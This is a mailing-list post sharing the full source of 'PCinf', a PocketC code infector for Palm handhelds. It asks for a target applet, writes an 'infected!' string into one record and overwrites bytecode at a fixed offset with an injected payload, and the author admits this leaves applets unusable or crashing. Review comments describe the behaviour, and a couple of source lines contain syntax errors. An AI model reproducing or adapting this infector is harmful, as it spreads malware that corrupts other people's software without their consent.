From: qobaiashi at gmx.net (qobaiashi@....net)
Subject: // playing pocketc woops

there was a typo in the code..

take this one:

// PCinf.c

/*
  this is a simple code infector
  for pocketc running on palm
  compatible hardware.

  it injects a string printing
  code.
  you can also use the launch()
  code and exec eg. "memo"..

  unpleasant side effects:
  *atm the applet gets "unusable"
   for its normal purpose :>
  *bigger applets crash due to
   this buggy "ret" thingie..

  by qobaiashi

*/

#define LOCATION 0x1d

/*
 * Entry point of the PCinf listing (PocketC dialect, not standard C).
 *
 * What the visible code does, in order:
 *   1. prints a banner and asks for the name of an applet database;
 *   2. opens that database with dbopen() and selects record 2 with dbrec();
 *   3. seeks to offset dbsize() in the current record and writes bytes
 *      taken from msg there;
 *   4. seeks to offset LOCATION (0x1d) and writes bytes taken from code,
 *      then overwrites the bytes at LOCATION+1 and LOCATION+2;
 *   5. closes the database.
 *
 * Properties that matter when analysing an affected database:
 *   - the target is modified in place; no copy of the original contents
 *     is kept and nothing checks what was stored at LOCATION before it
 *     is overwritten;
 *   - no return value of any db*() call is checked, so a failed open or
 *     seek is not detected by this code;
 *   - the changes are confined to data written at the former end of a
 *     record and to bytes starting at offset 0x1d, so a comparison with
 *     a known-good copy of the applet database should show them
 *     (presumably the record also grows - confirm on a sample).
 *
 * NOTE(review): the semantics of the dbwritex() format arguments and the
 * meaning of the byte values in code[] are not established by this
 * listing; confirm against PocketC documentation before relying on them.
 */
main()
{
string name,
// 11-byte payload that is later written at offset LOCATION
code[11] =
{"\x03\x90\x05\x07\x28\x01
\x2c\x2b\x2f\x29\x00"};
msg[12] =
// 1st byte = strlen!
// (0x0a = 10, the length of "infected!\n")
{"\x0ainfected!\n\x00"};
int dbcntr = 0, cntr, record, size,
r2size;
char patch;
pointer ptr;

// banner
clear();
puts(" ---PCinf--- \n");
puts("   PocketC   \n");
puts("  infector   \n");
puts(" by qobaiashi\n\n");

// The database name comes straight from user input; the only check is
// for an empty string.
name = gets("Applet to infect:");
if (strlen(name) == 0)
   {
    puts("[!] i need a victim..\n");
    // NOTE(review): whether launch() returns is not shown here; if it
    // does, execution continues below with an empty name.
    launch("PktC");
    }

puts("[*] using applet: "+name+
                              "\n");
// opening said database
// (result of dbopen() is not checked)
dbopen(name);

//---string infector section---\\
//write a string into #2

// set record number:
record = 2;
dbrec(record);

// dbsize() is saved twice: dbcntr is the seek target below, r2size is
// kept for the one-byte patch written near the end of main().
dbcntr = dbsize();
r2size = dbcntr;// for patching..

puts("using record "+record+"\n");
puts("record size = "+dbcntr+"\n";
// set offset in current record
dbseek(dbcntr);

puts("location is "+dbpos()+"\n\n");
size = strlen(msg);

// Two writes from msg: first from msg+size with format 'c', then from
// the start of msg.
ptr = msg+size;
dbwritex(ptr, 'c');
ptr = msg;
dbwritex(ptr, 'ssize');

//---code infector section---\\
// set record number
record = 0;
dbcntr = dbsize();
puts("using record "+record+"\n");
puts("record size = "+dbcntr"\n");

// set offset in current record
dbseek(LOCATION);
puts("location is "+dbpos()+"\n\n");

// write out hostile code
// (overwrites whatever the record held at this offset; nothing is saved)
ptr = code;
dbwritex(ptr, 'ssize');

// patch 0x00 into code
// (size still holds strlen(msg) from the string section above)
ptr = code + size;
dbseek(LOCATION+1);
dbwritex(ptr, 'c');

// patch string offset in #2 into code
// (r2size is an int narrowed into a char here, so only one byte of the
// saved size is written)
dbseek(LOCATION+2);
patch = r2size;
dbwritex(&patch, 'c');

dbclose();
puts(" infection done!\n");
}



